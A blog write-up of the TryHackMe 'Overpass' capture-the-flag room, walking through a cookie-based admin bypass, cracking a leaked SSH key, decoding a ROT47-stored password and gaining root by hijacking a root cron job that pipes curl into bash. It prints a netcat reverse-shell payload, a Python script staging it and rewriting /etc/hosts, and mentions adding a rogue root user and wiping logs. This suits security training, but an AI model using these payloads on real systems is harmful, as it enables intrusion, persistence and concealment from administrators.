IP = 10.10.56.108*
Difficulty: Easy
Machine OS: Linux
Learning Platform: tryhackme.com
Finished on: Arch Linux
Reconnaissance
Scoping and Preparation
Connect to OpenVPN Server using:
sudo openvpn {PATH_TO_OVPN_FILE}
I used my tool CTFRecon-Go to automate directory creation, port scanning, web directory brute-forcing and adding the entry to the /etc/hosts file.
Alternatively, you can download the release binary for CTFRecon-Go: https://github.com/hambyhacks/CTFRecon-Go/releases/download/v.1.0.0/CTFRecon-Go
Enumeration
Preliminary Enumeration via nmap
Table 1.1: nmap Results Summary
Machine OS: based on the OpenSSH version banner, the machine is running Ubuntu Bionic (18.04).
Let's look at the HTTP server on port 80.
Web Enumeration
On the homepage of overpass.thm, we can see that the developers offer a password encryption app.
Let's check the source code of the webpage to see if the developers left any comments in it.
There is a comment in the source code! After a quick search, it became clear that the developer is hinting that the encryption method they use is a Caesar cipher. We can verify this later when we analyze the source code of the password encryption app.
Checking the GoBuster scan results, we can see two directories that are interesting: /admin and /downloads/.
Let's look at the /downloads directory first.
Let's download the source code and take notes on it.
Reading through the source code, it seems that the app saves the encrypted password in a file named .overpass.
Interestingly, the binary is using the ROT47 cipher, which is a Caesar cipher with a fixed shift of 47 over the 94 printable ASCII characters (exactly what the developer's comment on the homepage was referring to). Because 47 is half of 94, applying ROT47 twice returns the original text, so decryption is the same operation as encryption.
Let's take note of this and come back to it later.
We can also look at the /aboutus page to harvest usernames.
Now let's look at the /admin page.
Testing the login form for SQL injection did not work, so I looked at the source code of the /admin page.
There are .js files loaded by the /admin page. Let's check the contents of those files.
Main.js
It seems like the web app is not finished yet.
Login.js
The function login calls /api/login and stores the response in the StatusOrCookies variable. Unless that response is the string Incorrect Credentials, the response is treated as a session cookie and the /admin page is loaded. In other words, whether we are "logged in" depends only on a SessionToken cookie being present, so we can try submitting an empty cookie to see how the webpage responds.
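To make the flaw concrete, here is an added example (not the Overpass server's code, which the page does not show): a model of two ways the /admin endpoint could decide who is logged in. The vulnerable handler only checks that a SessionToken cookie exists, which is the behaviour the write-up demonstrates next; the fixed handler looks the token up in a server-side session store. The store, the issue_session helper and the cookie strings are all constructed for this example.

```python
"""
Model of the /admin session check. Added example: the real server-side code
is not on the page, so both handlers are assumptions reconstructed from the
behaviour the write-up demonstrates (any SessionToken cookie unlocks /admin).
"""
import hmac
import secrets

# Constructed in-memory session store (token -> username). A correct
# /api/login inserts into this only after the password check succeeds.
SESSION_STORE = {}


def parse_cookie_header(header: str) -> dict:
    """Minimal Cookie: header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for pair in header.split(";"):
        name, sep, value = pair.partition("=")
        name = name.strip()
        if name and sep:
            cookies[name] = value.strip()
    return cookies


def issue_session(username: str) -> str:
    """What a correct /api/login returns on success: an unguessable token
    that the server remembers, so only tokens it issued are ever accepted."""
    token = secrets.token_urlsafe(32)
    SESSION_STORE[token] = username
    return token


def is_admin_vulnerable(cookie_header: str) -> bool:
    """The flaw the write-up exploits: the cookie's presence is the only
    check, so a browser-added 'SessionToken= ' cookie counts as a login."""
    return "SessionToken" in parse_cookie_header(cookie_header)


def is_admin_fixed(cookie_header: str) -> bool:
    """Reject blank tokens, then look the value up in the server-side store.
    compare_digest keeps the comparison constant-time for every candidate."""
    token = parse_cookie_header(cookie_header).get("SessionToken", "")
    if not token:
        return False
    return any(hmac.compare_digest(token.encode(), known.encode())
               for known in SESSION_STORE)


if __name__ == "__main__":
    forged = "SessionToken= "          # what the Storage tab trick produces
    print("vulnerable check accepts forged cookie:", is_admin_vulnerable(forged))
    print("fixed check accepts forged cookie:     ", is_admin_fixed(forged))
    real = issue_session("james")
    print("fixed check accepts issued token:      ", is_admin_fixed("SessionToken=" + real))
```

The fix is entirely server-side: the browser can set any cookie it likes, so nothing the client does (including the JavaScript in login.js) can be trusted as proof of authentication.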
Exploitation
Now that we have a basic understanding of how the web app's authentication works, we can try to exploit it.
Steps to Reproduce
1. Navigate to the /admin/ page.
2. Open the developer console (F12, or right click and click Inspect) in your preferred browser (Firefox is used in this case).
3. Navigate to the Storage tab and click on Cookies.
4. Click the + icon and rename the new cookie to SessionToken, with any value you like (even a single space will work).
5. Reload the page using CTRL + R. We should be redirected to the admin page as shown in the image below.
6. Copy the id_rsa content displayed on the /admin page. The comment above it tells us that this SSH private key belongs to the user James.
7. Use ssh2john to convert the passphrase-protected id_rsa into a format that JohnTheRipper can crack, then run john to recover the passphrase:
ssh2john [ID_RSA file] > [OUTPUT FILE]
john [OUTPUT FILE]
Log in through SSH using the cracked id_rsa file and the passphrase john found (remember to chmod 600 the key file first, or ssh will refuse to use it).
Table 1.2: Credentials
Post-Exploitation
Enumeration
Table 1.3: Checklist for Linux Internal Enumeration
Notes: For more information about the commands look here.
Tip: When nothing else makes sense, try LinPEAS (winPEAS for Windows machines).
Looking in James's home directory, we can see some interesting files named .overpass, user.txt and todo.txt.
Todo.txt
It seems James used the app to encrypt his password. Since the .overpass file holds James's encrypted password, we can copy its contents and decrypt them; I used CyberChef for this.
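For readers who would rather decode it offline than paste it into CyberChef, here is an added example (my own code, not the Overpass binary's Go source) covering both the ROT47 finding from the /downloads source analysis and the .overpass decryption above. It implements the general Caesar shift over the printable ASCII range, of which ROT47 is the self-inverse special case; the sample ciphertext is constructed for this example and is not the contents of James's real .overpass file.

```python
"""
ROT47 as used by the overpass binary, implemented as the general case:
a Caesar shift by n over the 94 printable ASCII characters '!' (33) to
'~' (126). With n = 47 the shift is half the alphabet, so the cipher is
its own inverse and "decryption" is just running it again.
Added example; not code from the room or the original write-up.
"""

FIRST, LAST = 33, 126          # '!' .. '~'
ALPHABET = LAST - FIRST + 1    # 94 printable characters


def shift_printable(text: str, n: int) -> str:
    """Rotate every printable ASCII character by n; leave everything else
    (spaces, newlines, non-ASCII) untouched, which is what ROT47 does."""
    out = []
    for ch in text:
        code = ord(ch)
        if FIRST <= code <= LAST:
            out.append(chr(FIRST + (code - FIRST + n) % ALPHABET))
        else:
            out.append(ch)
    return "".join(out)


def rot47(text: str) -> str:
    """Encrypt or decrypt: the same function does both."""
    return shift_printable(text, 47)


def decrypt_overpass(contents: str) -> str:
    """Decode text copied out of a .overpass file (the page only tells us the
    stored value is ROT47 of the password, so that is all this assumes)."""
    return rot47(contents.strip())


if __name__ == "__main__":
    # Constructed sample, not James's real file: rot47("Password123")
    sample = "!2DDH@C5`ab\n"
    print("decoded:", decrypt_overpass(sample))
    print("round trip ok:", rot47(rot47("Password123")) == "Password123")
```

Because the shift is fixed and the character set is public, this is an encoding, not encryption: anyone who reads the file recovers the password with no key at all, which is exactly why the developer's "Caesar cipher" comment was a red flag.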
With James's password in hand we can try sudo, but it turns out James is not allowed to run sudo on this host.
Looking at /etc/crontab, we find a cron job that runs as root! It runs every minute, fetches buildscript.sh with a curl GET request and pipes the result into bash.
Let's look at the /etc/hosts file, since the cron job uses overpass.thm as its host.
As the image above shows, the /etc/hosts file has faulty permissions: it is writable by unprivileged users, including James.
Normally /etc/hosts has permissions of -rw-r--r-- and is owned by root, meaning only the root user can write to it.
We can use this to our advantage by changing the IP of the overpass.thm entry in /etc/hosts, so that the cron job's curl request resolves to a host we control.
Privilege Escalation
Knowing that the cron job executes as root and that we can edit the content of /etc/hosts, we can now try to escalate our privileges.
1. Edit the /etc/hosts file, replacing the IP next to the overpass.thm entry with your attacking machine's IP (the address of your VPN interface).
2. On your attacking machine, create a directory structure that matches the path in the crontab entry.
3. Create a file named buildscript.sh in the /downloads/src/ directory you just created.
4. Put a reverse shell into buildscript.sh using any text editor you want.
buildscript.sh content:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {IP} {PORT} >/tmp/f
5. Go back two directories and start an HTTP server on port 80 using python (port 80 because the URL in the crontab entry has no explicit port).
cd ../../
sudo python3 -m http.server 80
6. Set up a reverse shell listener using nc (nc -lvnp {PORT}).
7. If everything is set up properly, it should look like this.
Wait for up to one minute and the root shell should pop.
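The attacker-side preparation above, as an added example in Python (my own helper script, not part of the original write-up or the room). It checks that a hosts file really is world-writable, rewrites only the overpass.thm entry while leaving other names on the same line intact, and stages buildscript.sh under the same downloads/src/ path the cron job requests. The listener address 10.8.0.1:4444 and the sample hosts file are placeholders constructed for the example; the demo runs entirely in a scratch directory, so on a real box you would point rewrite_hosts at /etc/hosts and then start the web server and nc listener as in the steps.

```python
"""
Attacker-side helpers for the cron hijack. Added example, not the original
write-up's code. Assumes the cron entry fetches
http://overpass.thm/downloads/src/buildscript.sh and pipes it into bash;
10.8.0.1:4444 is a placeholder for the attacker's VPN IP and nc port.
"""
import os
import stat
import tempfile

PAYLOAD_PATH = "downloads/src/buildscript.sh"   # mirrors the URL path curl requests
REVERSE_SHELL = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {ip} {port} >/tmp/f\n"


def is_world_writable(path: str) -> bool:
    """True when 'other' has write permission (e.g. -rw-rw-rw- on /etc/hosts)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def rewrite_hosts(hosts_text: str, hostname: str, new_ip: str) -> str:
    """Point `hostname` at `new_ip` and leave every other mapping untouched.

    A hosts line is '<ip> <name> [alias ...]' with an optional '#' comment.
    If the target name shares a line with other names, only the target is
    moved, so e.g. 'localhost' keeps resolving to 127.0.0.1.
    """
    out, done = [], False
    for line in hosts_text.splitlines():
        body, _, comment = line.partition("#")
        fields = body.split()
        if len(fields) >= 2 and hostname in fields[1:]:
            remaining = [f for f in fields[1:] if f != hostname]
            if remaining:
                kept = " ".join([fields[0]] + remaining)
                out.append(kept + (" #" + comment if comment else ""))
            out.append(f"{new_ip} {hostname}")
            done = True
        else:
            out.append(line)
    if not done:                       # name absent: append a fresh entry
        out.append(f"{new_ip} {hostname}")
    return "\n".join(out) + "\n"


def stage_payload(webroot: str, lhost: str, lport: int) -> str:
    """Create <webroot>/downloads/src/buildscript.sh holding the reverse shell."""
    full = os.path.join(webroot, PAYLOAD_PATH)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(REVERSE_SHELL.format(ip=lhost, port=lport))
    return full


def demo(lhost: str = "10.8.0.1", lport: int = 4444) -> dict:
    """Run the whole preparation in a scratch directory and return the results
    so they can be inspected offline (nothing here touches the real /etc/hosts)."""
    with tempfile.TemporaryDirectory() as tmp:
        hosts = os.path.join(tmp, "hosts")
        with open(hosts, "w") as fh:   # constructed stand-in for the target's /etc/hosts
            fh.write("127.0.0.1 localhost\n127.0.0.1 overpass.thm\n")
        os.chmod(hosts, 0o666)         # the faulty permissions found on the box
        writable = is_world_writable(hosts)
        with open(hosts) as fh:
            new_hosts = rewrite_hosts(fh.read(), "overpass.thm", lhost)
        if writable:
            with open(hosts, "w") as fh:
                fh.write(new_hosts)
        payload = stage_payload(os.path.join(tmp, "www"), lhost, lport)
        with open(payload) as fh:
            payload_text = fh.read()
    return {"world_writable": writable, "hosts": new_hosts, "payload": payload_text}


if __name__ == "__main__":
    result = demo()
    print("hosts file world-writable:", result["world_writable"])
    print(result["hosts"], end="")
    print(result["payload"], end="")
    print("next: cd www && sudo python3 -m http.server 80   (curl uses port 80)")
    print("next: nc -lvnp 4444   (then wait for the minute boundary)")
```

Two details worth checking before waiting on the cron job: the HTTP server must listen on port 80 because the crontab URL carries no port, and the listener must be up before the next minute boundary, since the job runs once per minute and the payload's nc connects back immediately.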
STATUS: ROOTED
The next two steps are not necessary to complete the machine, but they round out the five phases of penetration testing.
Persistence
Copied the /etc/shadow file to identify users and their password hashes.
Added another root user for easy access.
Clearing Tracks
Removed all logs and footprints to reduce the risk of the breach being exposed to the security administrator.
Status: Finished
Feel free to reach out if there is something wrong with the above post. Feedback is also appreciated! :D
Originally published at https://hambyhacks.hashnode.dev.